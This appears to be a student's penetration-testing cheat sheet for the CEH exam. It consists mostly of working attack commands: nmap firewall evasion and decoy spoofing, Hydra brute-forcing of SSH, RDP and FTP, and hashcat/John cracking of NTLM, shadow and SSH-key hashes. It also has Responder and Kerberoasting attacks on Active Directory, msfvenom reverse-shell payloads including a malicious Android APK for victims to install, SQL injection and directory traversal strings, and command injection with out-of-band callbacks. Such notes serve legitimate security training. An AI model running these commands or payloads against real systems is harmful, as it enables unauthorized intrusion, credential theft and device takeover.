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Last updated
Some Google dorks for recon on site.
https://citizenevidence.amnestyusa.org/ for Youtube video analysis.
FTP indexers
Website Recon
sublist3r (from github)
Recon on people
harvester tool from kali
ping www.certifiedhacker.com -i 2 -n 1(check the life span of the packet) Repeat this and increase the TTL value until reach the IP address from www.certifiedhacker.com that we trace routed before. ping www.certifiedhacker.com -i 19 -n 1
Done! These results implies when you set the TTL to 19(in this case) the reply is received from destination host ( Keep in mind that the output will be similar to the trace route results.
Netdiscover (to identify the devices & its ips in a network) / Angry Ip Scanner
netdiscover --> netdiscover -i eth0 -->This will help me to get the machines available on our network. --> netdiscover -r --> netdiscover -i eth0 -P -r
Website Mirroring: Tool: wget:#wget --mirror --convert-links --adjust-extension --no-parent --page-requisites google.com OR #wget -mkEpnp google.com (shortform)
nslookup command:
type=a www.certifiedhacker.com To obtain the Authoritative name server, set the type to CNAME record and query the target: set type=cname certifiedhacker.com
Final analysis:
Maltego: -->Open maltego and do all details verification and make account with Comunity edition -->Drag and drop any entity like domain or Ip you have to further enumeration by right clicking on that entity. -->Maltego Domain Information: drag n drop domain entity double click to change the name of the domain right click for more further options for Information gathering like: Phone numbers,Address,DNS information(records),Ip address,location,emails..etc
theHarvester -d certifiedhacker.com -l 300 -b all theHarvester may return too much information to go through, for better readability, you can write the output to an HTML file: theHarvester -d certifiedhacker.com -l 300 -b all -f report
Use Ping Command to Know If Ip/Host Is Live/Active Or not ping google.com ping
-->Tools: Angry Ip Scanner
--------Advance Scan
nmap > /path/of/file.txt (save output in file) (>> : for appending) nmap -oG - > /path/of/file.txt (grepable output) (no recom) nmap -Pn (No Ping,Stealthy,fast) nmap (range scan) nmap
#With Scripts:
nmap -sS --script=discovery nmap --script-help=http-waf-detect.nse nmap -sS --script "smb2*" -T 4
--------Firewall Bypass
nmap -f (packet fragmentation:small packets) nmap --mtu 16 (custom packet fragementation,16 bits) nmap -D RND:16 (Take Random IP Source To Bypass the Wall,no log) nmap -S -e eth0 (Take Custom Ip Source,no log) nmap -sI -e eth0 (Zombie Host,Take victim IP as Your Souce IP,Note Victim Ip should be alive) nmap --source-port 65 (Change our Source Port to Bypass Wall) namp -sT -PN --spoof-mac 0 (Random Mac Spoofing)
Scan all opened ports with more details nmap -p443,80,53,135,8080,8888 -A -O -sV -sC -T4 -oN nmapOutput [https://www.stationx.net/nmap-cheat-sheet/] nmap -Pn -sS -A -oX Test nmap -sV -sC -oA nmap.txt 10.10.10.x nmap -sC -sV -v -oN nmap.txt 10.10.10.x nmap -sS -P0 -A -v 10.10.10.x masscan -e tun0 -pi-65535 --rate=1000 nmap -sU -sV -A -T4 -v -oN udp.txt 10.10.10.x Scan all ports
nmap -p-
Port Scanning using Hping3:
hping3 --scan 1-3000 -S --scan parameter defines the port range to scan and –S represents SYN flag. Pinging the target using HPing3: hping3 -c 3 -c 3 means that we only want to send three packets to the target machine. UDP Packet Crafting hping3 --udp --rand-source --data 500 TCP SYN request hping3 -S -p 80 -c 5 -S will perform TCP SYN request on the target machine, -p will pass the traffic through which port is assigned, and -c is the count of the packets sent to the Target machine. HPing flood hping3 --flood
Banner Grabbing(O.S Fingerprints,software version..etc): Tools: ID Serve Software (grc.com) -Enter the Domain Name It Will Fetch Out the Banner Netcraft Extension sitereport.netcraft.com (Ctrl+f : Server) Using Netcat: 1. connect to vaulnerable machine using:# nc -vn 80 Hit Go 2. Now It will get connect and we have to Generate the Error soo that server will Show up the Banner 3. Type : HTTP/1.0 200 Ok and Enter....It will Show error With Banner Disclosure. ># nc -vn 22 (give version of ssh) ># nc -vn 21 (give version of ftp) In This way we can grab any service Verison/Banner just by changing the port using netcat
Scanning For Vulnerabilities(Network Vulnerabilities,Open Ports and running Services,application and services Vulnerabilities,application and services configuration errors):
Tools: Nessus Nikto nikto -h vulnweb.com nikto -h google.com -o nikto_scan -F txt -p 80 Wpscan
-->Nmap See all Scripts Here: #ls -l /usr/share/nmap/scripts See particular scripts by your need #ls -l /usr/share/nmap/scripts | grep ssh #ls -l /usr/share/nmap/scripts | grep ftp #ls -l /usr/share/nmap/scripts | grep brute ...etc
-->WPSCAN(Wordpress vul scanner) #wpscan #wpscan --url Enumerate Users: #wpscan --url --enumerate u
wpscan --url --enumerate u Password Bruteforcing For Particular USername: #wpscan --url -U admin -P /path/wordlist.txt -o /path/output.txt -f txt or json User Enumeration : wpscan --url https://example/ --enumerate u Bruteforce: wpscan --url https://example/ --passwords wordlist.txt --usernames samson wpscan –-url -t 50 -U admin -P rockyou.txt Wordpress enumerate user using metasploit: --> use auxiliary/scanner/http/wordpress_login_enum --> FILE_PASS --> RHOST (Target) --> RPORT --> TARGETURI (URL) - [http://[IP Address of Windows Server 2016]:8080/CEH] --> Username
-->User Name And User Groups -->Deflaut passwords -->Lists of computers,their operating systems and ports -->Machine names,network resources and services -->Lists of shares on individual hosts on the network -->Policies and passwords
TOol: GLobal Network Inventory (most recomm,show network and sytem info) Super Scan Hyena NetBIOS enumerater Attacker uses this info such as enumerated usernames and perform pass guessing tech to crack user acc SoftPerfect Network Scanner if the selected host is not t=secure we may able to perform activities such as sending mess,shutting down a computer remotely..etc Nmap-Zenmap GUI After scanning Look for Ports like 139,445,161..etc or netbios,snmp names ..etc Nmap:
nmap -sP (Ping Sweep)(scan all the hosts on the network range,starts displaying all host that r up and device info)
nmap -sS (Stealthy SYN scan and lists all open ports on that ip)
namp -sSV -O (stealth SYN scan with version detection/OS Detection)
nmap -sSV -O -oN output.txt (save all result in a file.txt) attacker might find vuln associated with that particular app and exploit to take access to target machine
NetBIOS Enumeration: nbtstat -A (on windows,Own Ip to get Netbios Table containing netbios name)
SMB Enumeration: smbclient -L (see if you have direct access through anonymous login) smbclient // -->With Nmap: nmap -p445 -A -->Nmap Scripts: ls /usr/share/nmap/scripts | grep smb nmap --script=smb-enum-users nmap --script=smb-enum-shares
SNMP Enumeration:: -nmap -sS -A (look for snmp open port,if found run this following on that particular port) -nmap -sU -p 161 (port 161 snmp open found) -nmap -sU -p 161 --script=snmp-brute (running script on 161 snmp port for extracting community string from the target machine with valid credentials) -Now,run metasploit > msfconsole
use auxiliary/scanner/snmp/snmp_login show options > set RHOSTS exploit ||Login success|| -Now load > use auxiliary/scanner/snmp/snmp_enum show options > set RHOSTS exploit ||DONE||
LDAP Enumeration:: Tool: Active Directory Explorer(ADExplorer)
SMTP Enumeration: >msfconsole >search smtp >use auxiliary/scanner/smtp/smtp_enum (user enumeration) >set RHOSTS <-target-ip-> >exploit
**SMTP Enumeration: with nmap scrips: ls -al /usr/share/namp/scripts/ | grep -e "smtp" sudo nmap -p25 --scripts smtp-commands With Metasploit:
msfconsole search smtp (Look for smtp_enum) use auxiliary/scanner/smtp/smtp_enum show options set RHOSTS <-ip-> exploit (Gives all info like banner,users)
**DNS enumeration (Zone tranfer info,locating dns server and its records) (DNS server names,hostnames,machine names,user names,IP Adresses,etc)
Tools: --With host command host -t ns zonetransfer.me (gives avaiable name server)
--With nslookups
nslookup google.com
nslookup (give another interactive cmd and type following cmds for dns info of that particular domain(google))
set type=a >set type=cname >set type=ns >set type=mx google >google >google >google --On windows (Recommended)
nslookup (Run this on cmd alternative interactive cmd will open) server nsztml.digi.ninja (give the secondary dns server which we want to use as spoof for primary) set type=any (set info type to any means all info will ge fetched) ls -d zonetransfer.me (Give the domain name which dns server info you want) (SOA = Start of authority)
--With Dig (Most recommended) dig google.com dig google.com -t ns (name server info) dig google.com -t ns +short dig google.com -t mx dig google.com -t ns +short dig google.com -t aaaa ---Zone transfer using dig
dig axfr @nsztml.digi.ninja. zonetransfer.me
nikto -h http://www.goodshopping.com -Tuning 1 Nessus runs on https://localhost:8834 Username: admin Password: password Nessus -> Policies > Advanced scan Discovery > Host Discovery > Turn off Ping the remote host Port Scanning > check the Verify open TCP ports found by local port enumerators Advanced Max number of TCP sessions per host and = unlimited Max number of TCP sessions per scan = unlimited Credentials > Windows > Username & Password Save policy > Create new scan > User Defined Enter name & Target Schedule tab > Turn of Enabled Hit launch from drop-down of save.
--->Password Cracking:
With HASHCAT: hashcat.exe -m hash.txt rokyou.txt -O
(-m=0 means it will crack fro md5 hash,-a=3 means it will use bruteforcing method to crack the md5 hash,--force=ignores the warnings) >>hashcat -m 0 -a 0 /path/of/hash.txt /path/of/wordlist.txt --force (-m=0 means it will crack for md5 hash,-a=0 means it will use wordlist method to crack the md5
-m 0 designates the type of hash we are cracking (MD5); -a 0 designates a dictionary attack; -o cracked.txt is the output file for the cracked passwords; -target_hashes.txt is our input file of hashes; -/usr/share/wordlists/rockyou.txt = Path to the wordlist m - 0:MD5 100:SHA1 1400:SHA256 1700:SHA512 900:MD4 3200:BCRYPT
Also Important to check hash #hash-identifier #hash -m [file]
Crack NTLMv2 --> hashcat -m 5600 ntlmhash.txt rockyou.txt --force --> hashcat.exe -m hash.txt rokyou.txt -O
With John The Ripper(for weak pass & hashes only to crack:
Identify the Hash Type(MD5,SHA..etc) : https://hashes.com/en/tools/hash_identifier
john --format=raw-md5 --wordlist=/rockyou.txt hash1.txt john --format=raw-sha1 --wordlist=/rockyou.txt hash1.txt
john --format=raw-md5 password.txt [ To change password to plain text ] or
jhon hashed.txt
jhon man jhon Extract hashed from the zip and rar files: zip2jhon test.zip > hashed.txt rar2jhon test.rar > hashed.txt Now main command for Cracking passwords from hashes: jhon hashed.txt (Cracks Succesfully)
For cracking passwords of linux users:
jhon /etc/shadow
john /usr/share/responder/logs/ntlm.txt
Single crack mode: john --single --format=raw-sha1 crack.txt Crack the password in file using wordlist: john --wordlist=/usr/share/john/password.lst --format=raw-sha1 crack.txt (Crack.txt here contains the hashes)
Cracking service credentials like ssh
First have to convert the hash file to JOHN format : ssh2john /home/text/.ssh/id_rsa > crack.txt (Now we need to crack this crack.txt file with John The Ripper)
john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
To crack ZIP
zip2john file.zip > crack.txt
john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
Notes: –wordlist can be written as -w also
With Hydra:
-l Single Username,-L Username list,-p Password,-P Password list,-t Limit concurrent connections,-V Verbose output,-f Stop on correct login,-s Port
hydra -L /root/username.txt -x 3:3:1 attack.domain.com http-get-form "/brute4.php:login=^USER^&pin=^PASS^:Denied"
FOR FTP If username is already given = hydra -l samson -P -P /usr/share/wordlists/rockyou.txt ftp If password is given and needs to find username = hydra -L user.txt -p 123 ftp If both username and password is not given = hydra -L user.txt -P /usr/share/wordlists/rockyou.txt ftp FTP Bruteforce with Hydra hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt
FOR SSH hydra -L /usr/share/wordlists.rockyou.txt -P /usr/share/wordlists/rockyou.txt -t 4 ssh
FOR HTTP FORM hydra -L [user] -P [password] [IP] http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V hydra -l molly -P rockyou.txt http-post-form "/login:username=^USER^&password=^PASS^:Your username or password is incorrect."
hydra -l root -P passwords.txt [-t 32] ftp [ https://securitytutorials.co.uk/brute-forcing-passwords-with-thc-hydra/] hydra -L usernames.txt -P pass.txt mysql
--> hydra -l root -P passwords.txt [-t 32] ftp --> hydra -L usernames.txt -P pass.txt mysql --> hydra -l USERNAME -P /path/to/passwords.txt -f pop3 -V
--> hydra -V -f -L -P rdp:// --> hydra -t 4 -V -f -l administrator -P rockyou.txt rdp://
--> hydra -P common-snmp-community-strings.txt target.com snmp --> hydra -l Administrator -P words.txt smb -t 1 --> hydra -l root -P passwords.txt ssh
hydra -l root -P passwords.txt [-t 32] ftp hydra -L usernames.txt -P pass.txt mysql hydra -l USERNAME -P /path/to/passwords.txt -f pop3 -V hydra -V -f -L -P rdp:// hydra -P common-snmp-community-strings.txt target.com snmp hydra -l Administrator -P words.txt smb -t 1 hydra -l root -P passwords.txt ssh
Active Directory Attack Tool:
(In kali)Responder(LLMNR NBTNS Poisoning): Location: >cd /usr/share/responder (in this dic u will have responder.py file) #python Responder.py #python Responder.py -I eth0 -rdwv (works as listener and capture the hashes and dump it on the screen and save as hash.txt) Simultanouly Request to the Attacker Ip to get hash quickly.on search bar in file sys \ Crack that hash and Get the password out of it #hashcat -m 5600 hash.txt rockyou.txt --force -O --show or john ntlm.txt and Login to Domain controller.
(In kali)GetUserSPN(kerberoasting-service attack): > locate GetUser Location: >cd /usr/share/doc/python3-impacket/examples/GetUserSPNs.py (in this dic u will have GetUserSPNs.py file) Formate: #python GetUserSPNs.py /: -dc-ip -request for ex: #python GetUserSPNs.py BITTENTECH.local/anshb:Password123 -dc-ip -request This will Dump the Service Ticket Here in hash formate Now crack the hash With Hashcat and get the password(if weak): #hashcat -m 13100 hash.txt rockyou.txt --force -O
Dumping and cracking SAM Hashes
Open cmd in admin mode and run(on windows) wmic useraccount get name,sid it will show all users and their id's use this tool to dump the users hash:https://github.com/Seabreg/pwdump locate to pwdump7 Folder and and locate the Folder in cmd pwdump7.exe it will dump all hash from SAM file Save this hash and pass to Cracking Tool(ophcrack) to crack the Hashs and Know th Actual Passwords
service postgreql start msfconsole search windows/smb/netbios (use to search for any payload) or > show exploits > show payloads ..etc
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOSTS run
searchsploit -u (update) ls /usr/share/exploitdb (local database for exploit) searchsploit ftp / >searchsploit windows searchsploit php 5.3.1 (with version)
To Start Your Server To Host the file locally: python -m SimpleHTTPServer 80
msfvenom -p <-specify/the/payload-> LHOST= LPORT=4444 -f exe -o payload.exe (formate)
Windows Privilege Escalation: meterpreter>systeminfo meterpreter>background (runs in bg) meterpreter>session -i (again back to meterpreter> session) meterpreter>getuid / ls meterpreter>download anyfile.txt meterpreter>upload .txt meterpreter>ipconfig meterpreter>hashdump (sam hash dumping) meterpreter>netstat(knowing about firewalls) meterpreter>shell (get windows shell) meterpreter>net user (get all users on windows) Privilege Escalation: meterpreter>getsystem or meterpreter>background (put current session in bg) >search uac >use exploit/windows/local/bypassuac (exploit selected) >show options >show targets >set target 0(for 32 bits) >set SESSION (put the session number that u putted on bg previously) >show options >run (after successfull exploition and gaining Highest privelages,it will create new session for that highest privelage in bg) >session -i >getuid >getsystem (Done) >getuid
Steganography: Image,Text,Audio,video Tools: QuickStego (Image)(Hides text in image,.bmp extension and Size of image gets increase)basic DeepSound (Audio) (Hides text file inside audio,.wav,.flac,.ape,.mp3 extensions) omniHide (paid,only free trail)(All in one)(in free trail only image hidding is available) Steghide (Image/Audio) Stegsnow (Hiding Text Inside A Text) >get one text file(hide.txt) for hidding our text in it >stegsnow -C -m "This is hidden message" -p 1234 hide.txt newhide.txt (The text is now hidden in newhide.txt)(Hidding) >stegsnow -C -p 1234 newhide.txt (Unhidding) Snow (White space stegnography) >snow -C -m "My Hidding text" -p "Hidding password" hack.txt hacked.txt (hidding) >snow -C -p "Hidding password" hacked.txt (unhidding)
Predictable session token Session Sniffing Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc) Man-in-the-middle attack Man-in-the-browser attack
Client-side Session ID's stealing: XSS Javacript Trojans CSRF
Replay Attack :Auth Token not gets expires,which can be used for replay attack so that server authenticate the attacker also
Session Fixation
TCP/IP Hijacking
Browser Setup: Chrome:Go to Settings:Scroll Down:Click on Advance Options:Click on System:Open Proxy Settings:Internet Properties Pop-out:Click on Connections:click on LAN Settings:LAN Settings pop-up : click on box of use proxy server..:In Address put attackers Ip and 8080 port:click OK:click Apply:OK
-DNS Poisoning/Spoofing
http.request.method == “POST” -> Wireshark filter for filtering HTTP POST request
To find DOS (SYN and ACK) : tcp.flags.syn == 1 , tcp.flags.syn == 1 and tcp.flags.ack == 0 To find passwords : http.request.method == POST More reference: https://www.comparitech.com/net-admin/wireshark-cheat-sheet/
To find DOS: Look for Red and Black packets with around 1-2 simple packets in between and then pick any packet and check the Source and Destination IP with port(As per question)
Protocols Susceptible Some of the protocols that are vulnerable to sniffing attacks. IMAP, POP3, NNTP and HTTP all send over clear text data SMTP is sent in plain text and is viewable over the wire. SMTP v3 limits the information you can get, but you can still see it. FTP sends user ID and password in clear text TFTP passes everything in clear text TCP shows sequence numbers (usable in session hijacking) TCP and UCP show open ports IP shows source and destination addresses
ARP Resolves IP address to a MAC address Packets are ARP_REQUEST and ARP_REPLY Commands arp -a displays current ARP cache arp -d * clears ARP cache
Wireshark filters: !(arp or icmp or dns) Filters out the "noise" from ARP, DNS and ICMP requests ! - Clears out the protocols for better inspection tcp.port == 23 Look for specific ports using tcp.port ip.addr == Look for specific IP address ip.addr == && tcp.port == 23 Displays telnet packets containing that IP ip.src == && ip.dst == See all packets exchanged from IP source to destination IP http.request Displays HTTP GET requests tcp contains string Displays TCP segments that contain the word "string" tcp.flags==0x16 Filters TCP requests with ACK flag set
Directory Traversal: We are able to access any sensitive files on the web server. Look the urls and GET requests Properly,if they are fetching some file from the web server. https://test.com/show.app?view=oldarchive.html HTTP/1.1 localhost/dt_lab/language.php?lang=en.txt https://test.com/show.app?view=../../../../../Windows/system.ini HTTP/1.1 localhost/dt_lab/language.php?lang=..\..\en.txt (\ --> for windows) BYpasses: ....//....//....//etc/passwd encode / double-encode ./../../../../etc/passwd%00.jpg
Directory Listing:(absolute path:/etc/passwd , relative path: ../../../../etc.passwd) index of /images This occurs due to Index file unavaible.Hence it list out all the file which are in its root directory.We cannot get out of the root directory.
CRLF Injection: Adding Headers in request.\r\n see if your user input is getting reflected in response. add your crlf payload at that input field.
web cache posining: look for unkeyed header & insert the payload in that header. Capture the caching url with burp,see if the content is getting cached by X-cache:Hit/miss header in response. Add X-Forwarded-Host: attacker.com in that caching request and see if attacker.com gets reflected in response.Success. Now add Our XSS Payload in that unkeyed Header and hit go.Done.
SSH Bruteforce Attack: port 22 TCP encrypted Tools:-->nmap/metasploit
Hidden Field Manipulation/Parameter Tampering : Find "type"="hidden" by inspecting and Change the "value"= parameter to do successfull manipulation
SQL: GET/POST request injecting point,from address bar,from within app field and through queries and searches can be also performe operation on bd include INSERT<SELCT<UPDATE<DELTE<DROP 'blah' or 1=1 --' AND Password=Springfield' blah' UNION Select 0,username,password, 0 from users --
List Table names: 1' UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables#
List Columns: 1' UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns (for all tables listing) 1' UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='$TABLE_NAMES$'#(for particular table listing) 1' UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='users'#
Lab1-Task2: Perform an SQL Injection Attack Against MSSQL to Extract Databases using sqlmap Login a website Inspect element Dev tools->Console: document.cookie sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="value" –dbs -u: Specify the target URL --cookie: Specify the HTTP cookie header value --dbs: Enumerate DBMS databases Get a list of databases Select a database to extract its tables sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="value" -D moviescope –tables -D: Specify the DBMS database to enumerate --tables: Enumerate DBMS database tables Get a list of tables Select a column sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="value" -D moviescope –T User_Login --dump Get table data of this column sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="value" --os-shell Get the OS Shell TASKLIST
Blind SQL: https://portswigger.net/web-security/sql-injection/cheat-sheet https://portswigger.net/web-security/sql-injection/blind Don't Show any Error on screen
Cookie Vulnerable to Blind sql, on successful execution shows "Welcome back" on the screen On unsuccessful execution dont show "Welcome back" on the screen
OS Command Injection(Do portswigger labs):
https://portswigger.net/web-security/os-command-injection simple case:look for url parameters./ request body parameters commands can be: echo,ipconfig,uname -a | echo anything | & echo anything & || echo anything || | echo anything & echo anything
Blind OS Command Injection: injecting points can be: feedback form,request body parameters email parameter=anything@gmail.com || ping+ || (20 milli sec)
Blind OS Command Injection with output redirection: injecting points can be: feedback form, email parameter=anything@gmail.com || echo abcd > /var/www/images/file.txt ||
Blind OS Command Injection with out-of-band interaction injecting points can be: feedback form, email parameter=anything@gmail.com || nslookup xyz.burp.net ||
.burp.net || email parameter=anything@gmail.com || nslookup uname
.burp.net ||IDOR(Do portswigger labs): https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references
Making Payload: -->msfvenom -p android/meterpreter/reverse_tcp lhost= lport=4444 -o raw.apk To Start Your Server To Host the file locally: python -m SimpleHTTPServer 80 -->msfconsole
use multi/handler set payload android/meterpreter/reverse_tcp set lhost set lport 4444 show options run/exploit Victims click on raw.apk and we get meterpreter session successfully. meterpreter>help meterpreter>background meterpreter>upload meterpreter>sysinfo
Hashcalc: fast and easy way to use calculator that allows computing messages digests,checksums,and HMAC's for files as well as for text and hex strings